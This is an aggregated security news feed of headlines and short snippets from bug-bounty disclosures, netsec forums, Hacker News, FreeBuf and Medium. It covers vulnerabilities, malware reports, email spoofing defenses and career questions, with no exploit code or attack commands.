    Ruby disclosed a bug submitted by sohaib619: https://hackerone.com/reports/1301696
    AEM forms XXE Vulnerability
    Adobe disclosed a bug submitted by ismailmuh: https://hackerone.com/reports/1321070
    Disclosure of github access token in config file via nignx off-by-slash
    Adobe disclosed a bug submitted by letm3through: https://hackerone.com/reports/1386547
    Reflected xss and open redirect on larksuite.com using /?back_uri= parameter.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/955606 - Bounty: $500
    [IDOR] Modify other team's reminders via reminderId parameter
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/946323 - Bounty: $500
  • Open

    Propagating phishing via Slack webhooks
    submitted by /u/amirshk [link] [comments]
    Forensics Analysis of the NSO Group’s Pegasus Spyware
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
    BreakingFormation: Orca Security Research Team Discovers AWS CloudFormation Vulnerability
    submitted by /u/eberkut [link] [comments]  ( 1 min )
    SSH Bastion Host Best Practices
    submitted by /u/old-gregg [link] [comments]
    HiddenWall is a tool to generate a custom Hidden firewall to run in Linux kernel.
    submitted by /u/CoolerVoid [link] [comments]  ( 2 min )
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    Security bulletin for recent AWS Glue vulnerability
    Article URL: https://aws.amazon.com/security/security-bulletins/AWS-2022-002/ Comments URL: https://news.ycombinator.com/item?id=29927538 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Severe Vulnerability Found in Another NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481671995167506433 Comments URL: https://news.ycombinator.com/item?id=29923463 Points: 4 # Comments: 0  ( 1 min )
    AWS Superglue Vulnerability
    Article URL: https://orca.security/resources/blog/aws-glue-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29923004 Points: 29 # Comments: 3  ( 5 min )
    BreakingFormation: AWS CloudFormation Vulnerability
    Article URL: https://orca.security/resources/blog/aws-cloudformation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29922522 Points: 79 # Comments: 22  ( 5 min )
    Attacking RDP from Inside: Remote Desktop Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Comments URL: https://news.ycombinator.com/item?id=29920955 Points: 2 # Comments: 0  ( 11 min )
    Found a Vulnerability In NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481537073068843013 Comments URL: https://news.ycombinator.com/item?id=29918100 Points: 1 # Comments: 2  ( 1 min )
    Exploring the Log4Shell Vulnerability through files
    Article URL: https://blog.borneo.io/exploring-the-log4shell-vulnerability-dd7000eed4a4?gi=5d43b39b3d22 Comments URL: https://news.ycombinator.com/item?id=29915825 Points: 2 # Comments: 0  ( 7 min )
  • Open

    SPF Record Question
    If a root domain like sendgrid.net is added to an SPF record, does that mean any free user or paid user of sendgrid can spoof an email from your domain and SPF checks would pass? submitted by /u/mtx4gk [link] [comments]  ( 1 min )
    How do I check if I visited a site with malware?
    I was browsing through reddit and clicked on a link in r/dermotology that send me to a weird site that played a weird video and there was no question or content besides that. I used virus total to check the website and it looks like they're using it for advertising revenue clicks, but my paranoia is kicking in. Site was visited on an android with calyx is using duckduckgo version 5.106.0 So the question is- any ideas if I have to nuke this phone? For the curious the website is below. All the spaces are slashes minus the dot com part. vebotto com 2022 01 13 cystic-pimple submitted by /u/instantpotbeans [link] [comments]  ( 2 min )
    Google Drive Security - VPN and MFA
    Hi there, I'm posting here to get some expert advice, we are a small startup dealing with very sensitive customer data. Problems we are having - How do we best protect customer data within Google Drive? Customers often share data to us via Google Drive. In security questionnaire, we often get this question - is VPN required for employees to access customer data? We can of course turn on VPN requirement for this, but it also adds friction to use Google Drive on a daily basis. Google Drive has MFA turned on, but it does not seem to enforce zero trust policy, and we are never prompted to enter passwords regularly. Any suggestions here? submitted by /u/Commercial_Rip7550 [link] [comments]  ( 1 min )
    Reverse engineering question
    Hi r/AskNetsec I've got a pretty unusual question in regards to RE that might sound weird, or it's just not making sense to me (and bearing in mind, I am a beginner to reversing malware). I am currently writing a report and within the report format, "reverse engineering" and "disassembly" are two different sections. This doesn't really make much sense to me. Disassembly is already a form of reverse engineering. Nevertheless, the information that you could insert into an RE section would be Wireshark analysis, viewing the file in PEStudio for instance, but those are already in sections relating to static & dynamic analysis. So what would be inserted into a reverse engineering section regarding malware? I can literally only think of unpacking the malware as everything else that would constitute reverse engineering is in other sections. Honestly, I have no idea. When I asked for some help in regards to knowing the distinction between the two, I was told that "disassembly" is a noun, and "reverse engineering" is a verb. Which is probably right, but it didn't help at all. An example of breaking encryption was proposed in relation to RE. Again, it didn't shed much light for me. I just want to be familiar with the distinction here. Thanks. submitted by /u/pat0000 [link] [comments]  ( 2 min )
    Need an antivirus solution for webapp in MS Azure that is compliant with EU data protection law
    we run a webapp in azure. users can upload .zip, .pdf, .png, .jpeg and .csv files. therefore an antivirus scanner is needed for those files. at another project we use clamav in an azure container instance. the problem is containers don't scale very well. we would prefer a SAAS solution in azure but there are few options. we need a solution that is scalable and doesn't send the files to servers outside the EU due to the local data protection law. at best the software is made by an EU company. we thought about "abusing" an azure storage by uploading the files there and waiting if microsoft defender for cloud reacts. anyone any experience with this? how fast would such a solution be? any recommendations? TLDR: need antivirus software for file upload webapp in azure SAAS preferred scalability compliant with EU data protection law Thank you for your help! submitted by /u/devsecops22 [link] [comments]  ( 2 min )
    Brave Browser --Flags Questions
    Hi there r/AskNetsec I just wanted to ask a quick question if these specific flags out of the bunch that Brave runs is of any concern? The names sparked my interest and a bit of panic when I first noticed after using it for about a month. IdleDetection --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed Whole flag trace is this if needed: [redacted]\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --origin-trial-public-key=[redacted]=,[redacted]= --brave_session_token=[redacted] --field-trial-handle=[redacted],[redacted],[redacted] --enable-features=AutoupgradeMixedContent,LegacyTLSEnforced,PasswordImport,PrefetchPrivacyChanges,Red…  ( 1 min )
    Is there a solution to encrypt an OS at the RAM/CPU level?
    Thinking about cloud threat models, is there a solution that exists that can encrypt an OS at the RAM/CPU level to further restrict hosting providers ability to reach, view and use a machine outside of the usual disk encryption. While I am sure it’s a long shot but there does exist a possibility where can access the machine from a local terminal via their hosting infrastructure or dump the RAM on the hypervisor. Is there any way or value in preventing that or is it just a risk that has to be accepted when using a cloud provider? submitted by /u/concon2015 [link] [comments]  ( 1 min )
  • Open

    AVG Tune Up
    Anybody know what service AVG Tuneup uses to perform a cleanup when the program is executed? submitted by /u/mikefromjerz [link] [comments]  ( 1 min )
    I’ve heard SANS FOR508 and the GCFA is challenging. How challenging is it for an entry level candidate who is just starting out?
    Any tips? Experiences? I’ve had hands on forensics experience and have FOR500 knowledge. Is FOR508 doable? submitted by /u/curiousgal1996 [link] [comments]  ( 3 min )
  • Open

    Using GitHub to manage your first CVE
    Article URL: https://authzed.com/blog/using-github-to-manage-your-first-cve/ Comments URL: https://news.ycombinator.com/item?id=29925154 Points: 4 # Comments: 0  ( 9 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Prosody 0.11.12 released (CVE-2022-0217 fix)
    Article URL: https://blog.prosody.im/prosody-0.11.12-released/ Comments URL: https://news.ycombinator.com/item?id=29921870 Points: 3 # Comments: 0  ( 1 min )
    A Quick CVE-2022-21907 FAQ (work in progress)
    Article URL: https://isc.sans.edu/forums/diary/28234/ Comments URL: https://news.ycombinator.com/item?id=29917559 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Index of Movies, TV series and Documentaries (lots of BBC, how it's made etc..).
    submitted by /u/josephalbright1 [link] [comments]  ( 1 min )
    Sporalis
    https://drive.google.com/drive/folders/1rmL4Yn7mJ78emYQ-PjIhDGYkph_9iEjZ https://drive.google.com/drive/folders/1s3v5WdrPLEvnGLbzM8RGSyI0iorkbU-W https://drive.google.com/drive/folders/1nitHECSorEadPtGwK5F_9-TdAcHHJGZG submitted by /u/Burlack [link] [comments]
    Dont mind me. Just dropping some links to check size before downloading
    https://drive.google.com/drive/folders/1X2L-UtctJulbDEP63NnLSwlEaXgwTe0x https://drive.google.com/drive/folders/1pMRoHMd3H0P0g6lvEWFUR1teiPSy9VqR https://drive.google.com/drive/folders/0B2UZmHpzoVm6eXYyM09PUXF1TDA?resourcekey=0-A5ZN-_lF1S2Eh3xmJSC9kw https://drive.google.com/drive/folders/1nfMA72hL1PHFTWVkzjlSBAmfPyBg89dx https://drive.google.com/drive/folders/17KyX_80h0yBUrc3X-PMa3EnXoE0kFmJJ?sort=13&direction=a submitted by /u/Burlack [link] [comments]  ( 1 min )
    FTP OEM Pc Builder
    I'm trying to list the different ftp from computer builder. I think most of them are already present on this / r. But perhaps bringing them together in a single post is a good idea? (I will add them as I find them / the community finds them) HP FTP : ftp://ftp.hp.com |Url: ftp://ftp.hp.com/||Urls file| |Extension (Top 5)|Files|Size| |.exe|106,034|5.61 TiB| |.ibr|862|5.21 TiB| |.zip|10,739|443.95 GiB| |.fmw|290|384.7 GiB| |.iso|256|322.51 GiB| |Dirs: 83,006 Ext: 1,375|Total: 793,218|Total: 12.98 TiB| |Date (UTC): 2022-01-12 17:29:09|Time: 02:19:06|Speed: 22.87 MB/s (182.9 mbit)| Created by [KoalaBear84's OpenDirectory Indexer v2.2.0.9](https://github.com/KoalaBear84/OpenDirectoryDownloader/) IBM FTP : ftp://ftp.software.ibm.com/ |Url: ftp://ftp.software.ibm.com/||Urls file| |Extension (…  ( 2 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
    Why Bugfix Postmortems Are Good For Web3
    This past year has been eventful for anyone building on the Web3 stack — over the course of the year, DeFi has grown from a nascent… Continue reading on Immunefi »  ( 3 min )
    Launching Collector Portal for a closed beta group
    We are proud to announce our beta platform launch for selected users starting on the 26th of January. Continue reading on Envoy »  ( 2 min )
    FB Lite All Users Active Status Changed
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    C.S.T.I Lead To Account Takeover $$$
    Hello amazing hunter, Today i want to tell you a short story but this story has long memory for me. In this story i found some… Continue reading on System Weakness »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist (PART-1)
    Hey, it’s me again back with another checklist. I saw various articles and tools specifically designed to exploit one vulnerability. It… Continue reading on Medium »  ( 2 min )
    My Perfect Bug Bounty Docker Setup
    I hate installing things on my computer because of the bloated slow mess it becomes overtime. So when I found out about docker I fell in… Continue reading on System Weakness »  ( 3 min )
    PHP Type Juggling
    PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this… Continue reading on Medium »  ( 1 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-13 Review
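    Running an EXE program filelessly via PowerShell by ourren; QRS 2021 accepted papers list by ourren; Getting started with Android reverse engineering, development and protocol analysis by analyzing a football betting app by ourren. For more recent articles, visit SecWiki  ( 2 min )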
  • Open

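    FreeBuf Morning News | Financial data of large numbers of Americans and Canadians exposed; Firefox hit by connectivity failure
    Global news 1. Password manager LastPass may face a €20 million fine for failing to fix bugs: over its poor handling of problems and a number of other issues, the well-known password manager LastPass risks a €20 million GDPR fine. [Read the original] 2. US jail hit by ransomware, surveillance cameras and door control system disrupted: a jail in the Albuquerque area of central New Mexico was hit by ransomware last week; surveillance cameras became inaccessible and the automatic door system was also affected, causing inmates  ( 1 min )
    Freebuf enterprise security group discussion | Securing enterprise remote work
    From a security perspective, remote work means the boundary of the office network has been broken. How should enterprises re-examine their security strategy and reduce security risk?  ( 1 min )
    Millions of portable routers affected by KCodes NetUSB vulnerability
    Affected vendors include Netgear, TP-Link, Tenda, EDiMAX, D-Link and Western Digital.  ( 1 min )
    Financial data of large numbers of Americans and Canadians exposed
    Security researchers at Website Planet found a misconfigured database that exposed about 820,000 records, roughly 600,000 of which were customer credit records.  ( 1 min )
    Behavior analysis and decoding of the cross-platform malicious backdoor SysJoker
    In December 2021, Intezer discovered SysJoker, a cross-platform backdoor capable of attacking Windows, Mac and Linux.  ( 1 min )
    New malware SysJoker threatens Windows, Linux and macOS operating systems
    The new SysJoker malware poses a threat to Windows, Linux and macOS operating systems and can use its cross-platform backdoor to conduct espionage.  ( 1 min )
    "14th Five-Year Plan for Digital Economy Development" again highlights cybersecurity
    Chapter 9 of the Plan, "Focusing on strengthening the digital economy security system", systematically sets out the unique role and importance of cybersecurity for the digital economy.
    Studying cybersecurity laws and regulations to raise technical managers' legal literacy
    Understanding the hierarchy of different laws and regulations helps us better understand the state's aims in the legislative process.  ( 1 min )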
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC
    I briefly mentioned using DKIM to verify an email’s sender in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into how organizations can help stop email spoofing using a combination of three... The post Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC appeared first on TrustedSec.  ( 12 min )
  • Open

    Fuzzing101 with LibAFL – Part IV: Fuzzing LibTIFF
    Article URL: https://epi052.gitlab.io/notes-to-self/blog/2021-11-26-fuzzing-101-with-libafl-part-4/ Comments URL: https://news.ycombinator.com/item?id=29920636 Points: 1 # Comments: 0  ( 26 min )
  • Open

    Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
    submitted by /u/dmchell [link] [comments]
  • Open

    HONEYPOT DISCUSSIONS PART-1
    Welcome to Honeypot Discussions Part 1. There will be three parts of this article about honeypots. As here, in the first article we will be… Continue reading on Medium »  ( 5 min )

  • Open

    Miscellaneous Gaming Stuff.
    https://www.thegameisafootarcade.com/wp-content/uploads/ submitted by /u/EmuAnon34 [link] [comments]
    Are there such things as open navidrome / airsonic music servers to listen to?
    Rather than open directories of music, are there open servers that can be used with navidrome / airsonic clients to listen to the music? Are there strings one can use to maybe find them? The search engines aren't finding anything submitted by /u/papabear_12 [link] [comments]  ( 1 min )
  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )
  • Open

    Defeating EDRs with Office Products
    submitted by /u/dmchell [link] [comments]
  • Open

    Exploiting URL Parsing Confusion Vulnerabilities
    submitted by /u/ScottContini [link] [comments]
    Exploit Kits vs. Google Chrome
    submitted by /u/stashing_the_smack [link] [comments]
    Malicious modifications to open source projects affecting thousands
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
    submitted by /u/albinowax [link] [comments]
    ThePhish is an open-source tool that automates the entire phishing email analysis process starting from the extraction of the observables from the header and the body of an email to the elaboration of a verdict which is final in most cases. It is based on TheHive, Cortex and MISP.
    submitted by /u/emalderson [link] [comments]  ( 1 min )
    Ransomware Actor May Have Leaked Their Previous Victims
    submitted by /u/Acrobatic-Pen-9949 [link] [comments]  ( 1 min )
    Researchers release final version of academic study testing 25 EDR and EPP vendors against attacks vectors via CPL, HTA, DLL and EXE
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    [CFP] Call for Papers for Hardwear.io Security Conference USA 2022 is OPEN!
    submitted by /u/hardweario [link] [comments]
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    For beginners: compiling with afl, using libs/objects, and how to fuzz with afl/afl++ Continue reading on Medium »  ( 2 min )
  • Open

    Lessons learned from my 10 year open source project
    For the past ten years, I’ve been building a popular open source project. Here are the lessons I’ve learned along the way. Continue reading on Medium »  ( 11 min )
    Bundesservice Telekommunikation — a cover agency in the federal administration that I accidentally…
    A few days ago I did something so unusual that apparently almost no one had done it before me: it was the list that I… Continue reading on Medium »  ( 6 min )
    OSINT PAKISTAN POLITICIANS
    OSINT CASE STUDY 2 Continue reading on Medium »  ( 3 min )
    It’s a Match! Dating Apps and SOCMINT
    Just like any other social media platform, dating sites are platforms which can be used in online investigations. Considering the current… Continue reading on Medium »  ( 4 min )
  • Open

    Creative / Effective ways to run a security awareness program?
    It's that time of the year again: we are looking to renew our contract with our security awareness vendor. Basically, they provide a portal where people need to go to watch videos of how to prevent the regular security stuff (identify tailgating, spot phishing mails, etc). Some of these videos don't even make sense (e.g. we are for 99% working from home. Tailgating is not a real issue here). Part of this is a "must do" (due to compliance/certification requirements). However, there must surely be a more fun/creative way of doing this? What are some nice/creative ways you have set up security awareness within your organization? Side-note: yes, I know this should be risk based. Yes, I know I should talk to other departments to identify their needs. ;) Just looking for some experiences and ideas. submitted by /u/Flagcapturer [link] [comments]  ( 1 min )
    What is your home setup like and what tech gadgets do you have in your room?
    Hi I work in the InfoSec industry and having worked from home for the last year or so, I want to now start doing up my room and make it very techy At the moment, I do not have anything too exciting or amazing but I am interested to know what your home setups are like Thanks submitted by /u/dasozis [link] [comments]  ( 2 min )
    I get to help design a Cybersecurity room
    As the title says I get to help design a cyber security room for a community college. I want to ask the Netsec community. What would you like to see if you were young and were curious about this world? Tools you wish you had? Something that would have made you excited when you walked past to get into cyber security? All recommendations welcome, thank you! submitted by /u/benxfactor [link] [comments]  ( 3 min )
    Any resources/guides on pen-testing a network not facing the internet?
    Anyone have any resources for pen-testing a network that's supposed to be air gapped? I'm working with some colleagues to pen-test our professor's lab as part of our assignment--mainly putting together a report on how we would approach the system if we had hands on access as both an admin and as a non privileged user. The lab itself is pretty simple--it's not supposed to be running any web apps or even to be touching the internet. Most pentest guides are great at showing you how to approach scanning the network for misconfigurations and vulnerabilities and then moving over to web applications but I'm wondering if we're limited to just enumerating the system and hoping for the best? Mainly looking for resources I can use as references to back any ideas on what's doable. Thanks. submitted by /u/CyberspaceAggressor [link] [comments]  ( 1 min )
    Another subnetting question!
    I'm given the following network address - 209.165.201.0 /24. If I'm splitting this network into two, LAN1 will have 29 hosts and LAN2 with 17 hosts. What I did to subnet this network was incorrect but I don't know the correct answer. I thought LAN1 would have an IP of 209.165.201.0 /27 and LAN 2 would be 209.165.201.33 /27, but from what I understand now is that these subnets cannot share the same CIDR. How would you go about doing this? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Potential Risk from Using Bluetooth Headset on a company laptop?
    My company provides work laptops and headsets. However they don't have option for wireless headsets, only wired ones. They also advise against connecting any non company authorised peripherals to the laptop. I am wondering though, what would be realistic risks from connecting a Bluetooth headset to a laptop? submitted by /u/rw1337 [link] [comments]  ( 3 min )
    Internship Questions
    About a month after getting my CCNA training, I have my first interview for an internship in well-known MNC bank in networking field.. & I'm terribly nervous Guys, can you help me with some common questions asked in Bank Networking Interview.. submitted by /u/Aggressive-Dot-7339 [link] [comments]  ( 1 min )
    Best Identity Theft services for Companies
    In your experience what are the best Identity Theft services for Companies/Brands (not for individuals)? I am talking of services like: Identity Guard LifeLock IdentityForce Watchdog Thanks for the answers. submitted by /u/NerdSupremacist [link] [comments]  ( 2 min )
    Scanning for Network Listening Device - What is Blackice?
    Hey all, first of all, thanks for any help anyone can provide. I have a limited background in network security understanding from my undergrad in computer science, but have not dipped my toes in seriously in a while, so kinda stumbling through trying to figure this out. A friend asked me to check their network for any rogue listening devices and after a quick scan with Nmap, I came across this device on 192.168.0.1 described as "blackice-icecap". A quick google search makes it sound like this might actually be some kind of device set up to monitor network traffic. Is this something that is worth digging deeper into or am I misunderstanding this? What other avenues for rogue network monitoring should I be looking into? My first thought is that this is all probably a bit over my head, but I thought I'd at least give it a quick peek to see if I can find anything obvious to help my friend out. Thanks again for any feedback or advice. For reference, here is the relevant part of the Nmap result: Nmap scan report for 192.168.0.1 Host is up (0.033s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5000/tcp open upnp 8081/tcp filtered blackice-icecap 8082/tcp filtered blackice-alerts submitted by /u/wwants [link] [comments]  ( 1 min )
    Using mobile hotspot on my laptop. Where do I turn on VPN - phone or laptop?
    Hi all Simple question but very hard to find the answer. When I don't have access to good wifi, I'm going to be using mobile hotspot to access the internet on my laptop. Question is, where do I turn on my vpn - on my laptop? Or on my phone? Or just to be safe, on both? submitted by /u/AliveandDrive [link] [comments]  ( 3 min )
    Password Cracking LDS
    Has anyone ever done a password audit against an Active Directory LDS server (not regular AD server)? If so any directions on how to extract the hashes using standard tools like ImPacket or DSInternals? We have procedure to crack our AD passwords using these tools but LDS seems to be a slightly different beast. submitted by /u/clayjk [link] [comments]  ( 1 min )
    Best way to remove card from multiple services?
    I would like to unlink my card details on various services. It would be kind of a lot of work to login to each service and delete that info. Is there another way? Would just getting a new card be a good option? submitted by /u/extremexample [link] [comments]  ( 2 min )
    Can the operators of SS7s pull SMSs from carriers in the US at will?
    Provocative title, I know. "At will" is subjective. It was claimed in a post yesterday and today that this is something that SS7 operators can do (which is true). I talked to a security researcher (Lucky 225 on Twitter) who told me that the US is more locked down than other countries and phones 2014+ are using LTE implying that maybe most phones in the US aren't vulnerable to this. Of course, he's not a god and not omnipotent as none of us are. There are things that he doesn't know (as is the case for us all). Does anyone have more information on this that could clarify the extent of the vulnerability in terms of location, G (2G, 3G, etc) and limitations so we can know what we might be vulnerable to? Obviously, getting access to an SS7 is WAY harder than a smartphone, sim card and someone's personal info so maybe this isn't the biggest threat, but still... submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
  • Open

    Cybrary
    Hello, I’m currently pursuing my BS in Computer Forensics and Digital Investigation. I came across Cybrary and was wondering if that can help me practice more on the subject? I still feel very lost when taking college courses, I want to get more practice in me just want to know if Cybrary is worth the annual membership. If anyone has some tips on what courses to take there or other sites I would appreciate it. Thank you in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
    Investigating Message Read Status in Gmail & Google Workspace
    submitted by /u/No_Reflection_3360 [link] [comments]  ( 1 min )
    Interview questions
    So I read the FAQ and went through the SANS link which is posted to prepare for interviews in forensics. I am a recent graduate with a DF degree, and I had my first interview the other day but I am wondering what I could expect for the technical portion of the interview. Are there certain artifacts or definitions I should make sure I’m familiar with that can help? or any common scenario questions that get asked? I apologize if this isn’t the right place to ask this. submitted by /u/investtam [link] [comments]  ( 2 min )
  • Open

    Playing with Kerberos tickets (Host service)
    I’m going to share the results of some experimentation with Kerberos tickets. I’m sorry if this doesn’t add any new value or someone else… Continue reading on System Weakness »  ( 8 min )
  • Open

    Where can I learn windows binary exploitation from the basics?
    submitted by /u/wlo1337 [link] [comments]  ( 1 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, particularly web-based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    SecWiki News 2022-01-12 Review
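    Gartner 2021 Market Guide for Vulnerability Assessment by ourren Quick Reference to Emerging Cybersecurity Segments and Vendors · Cyber Security Billboard by ourren An Analysis of Cyberspace Mapping and Attribution Techniques by ourren A Survey of Research on Cyberspace Threat Hunting by ourren Chang'an "Fight the Epidemic" - WriteUp by ourren APT Group Intelligence Research Yearbook 2021 by ourren For more of the latest articles, visit SecWiki  ( 2 min )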
  • Open

    Preventing Broken Access Control: The No.1 OWASP Vulnerability in 2021
    Article URL: https://www.synack.com/blog/preventing-broken-access-control-the-no-1-vulnerability-in-the-owasp-top-10-2021/ Comments URL: https://news.ycombinator.com/item?id=29908197 Points: 3 # Comments: 0  ( 6 min )
  • Open

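    FreeBuf Morning Briefing | EU to Launch Large-Scale Supply Chain Security Exercise; Security Flaw Reported in Tesla Car Software
    A security researcher says some Tesla car software has a "serious" flaw that allows remotely unlocking the vehicle's doors and windows, starting the vehicle without a key, and disabling the security system.  ( 1 min )
    MLPS 2.0 Assessment Process Guide for the Secure Computing Environment: GaussDB (Huawei Gauss Database)
    An assessment guide for the Gauss database on a Huawei private cloud.  ( 1 min )
    Small and Medium-Sized Enterprises Are Easy Targets for Cyberattacks
    51% of small and medium-sized enterprises have experienced a cybersecurity breach, and the resulting cybercrime has become a problem that urgently needs solving.
    Great Wall Motor Is Hiring Multiple Security Professionals
    Great Wall Motor, a Chinese automobile brand founded in 1984, is hiring multiple security professionals.  ( 1 min )
    Applying and Implementing Cryptography in Personal Information Compliance
    Implementing personal information compliance, especially the obligation to safeguard personal information, is not only a legal issue but also an information security technology issue.  ( 1 min )
    New Variant of the RedLine Info-Stealer! Spreading Disguised as an Omicron Case Counter
    RedLine targets information such as user account credentials stored in browsers.  ( 1 min )
    Tophant PRS-NTA Passes Huawei Kunpeng 920 Compatibility Certification
    Committed to Xinchuang (IT application innovation), Tophant continues to deepen cooperation in the domestic technology ecosystem.
    Firefox Focus for Android Strengthens Privacy Protection, Blocking Cross-Site Tracking
    Firefox Focus for Android has further strengthened its privacy protections, preventing cookies from being used for advertising and for analyzing user behavior, thereby protecting users from cross-site tracking while they browse.  ( 1 min )
    Examples of Common Encryption Methods
    When we test for logic flaws or write crawlers and run into front-end encryption, we can usually choose to pull out the encryption algorithm and use it to encrypt the parameters we are debugging.  ( 10 min )
    Microsoft: powerdir Vulnerability Allows Access to macOS User Data
    Microsoft announced that threat actors can exploit a macOS vulnerability to bypass the Transparency, Consent, and Control (TCC) framework and access users' protected data.  ( 1 min )
    Notes on Industrial Cyber Ranges (7) | Outlook on Development Trends
    Digital transformation is accelerating the convergence of OT and IT, and the cybersecurity risks of OT/IT convergence are evolving along with it.  ( 1 min )
    Hackers Use a Vulnerability to Wipe Out Debt: How to "Know Early" About Such Vulnerabilities
    Using vulnerabilities to wipe out debt, steal data, or obtain login access to every account of game XX with one click: these "slick moves" that seem to come from wish-fulfillment fiction have in fact long been playing out in reality.  ( 1 min )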
  • Open

    How to attack Offensive Security Web Expert (OSWE)
    In this article, we will discuss about one of the toughest exams from Offensive Security, the web expert one (OSWE). Continue reading on Medium »
    Bug Bounty Methodology — Horizontal Enumeration
    While performing a security assessment our main goal is to map out all the domains owned by a single entity. This means knowing all the… Continue reading on Medium »  ( 3 min )
    Xiaomi Arbitrary JavaScript Vulnerability
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    learning prerequisites for hacking and bug bounty?
    hey computer geeks. i am writing this cause i have faced very problems in getting started in “cyber security” cause of i don’t know where… Continue reading on Medium »  ( 3 min )
    Attacking ARP: Learn Networking By Breaking Stuff For Bug Bounty Hunters, Penetration Testers, and…
    An introduction to the fundamentals of one of the most important protocols on the internet and the methodology to exploit it for fun and… Continue reading on Dev Genius »  ( 5 min )
    Subdomain Enumeration — The Right way (Prerequisites)
    So, I have seen various articles about subdomain enumeration and decided to make one in detail without confusing everyone with various… Continue reading on Medium »  ( 3 min )
  • Open

    Friend Request Flow Exposes User Data
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245741 - Bounty: $750
    Account Takeover via SMS Authentication Flow
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245762 - Bounty: $1750
    CSRF to change password
    Nord Security disclosed a bug submitted by paramdham: https://hackerone.com/reports/204703 - Bounty: $300
    Clickjacking to change email address
    Gener8 disclosed a bug submitted by paramdham: https://hackerone.com/reports/783191

  • Open

    CyberDefenders | L’espion
    The OSINT write-ups Continue reading on InfoSec Write-ups »  ( 3 min )
    What is OSINT
    Have you been trying to find someone online, specifically perhaps by using an email addresses, or username? Continue reading on Medium »  ( 7 min )
    Using fitness tracker apps for OSINT purposes
    The smartwatches and fitness trackers we wear know a myriad of information about us… From the places we visit, our coordinates, our health… Continue reading on Medium »  ( 5 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
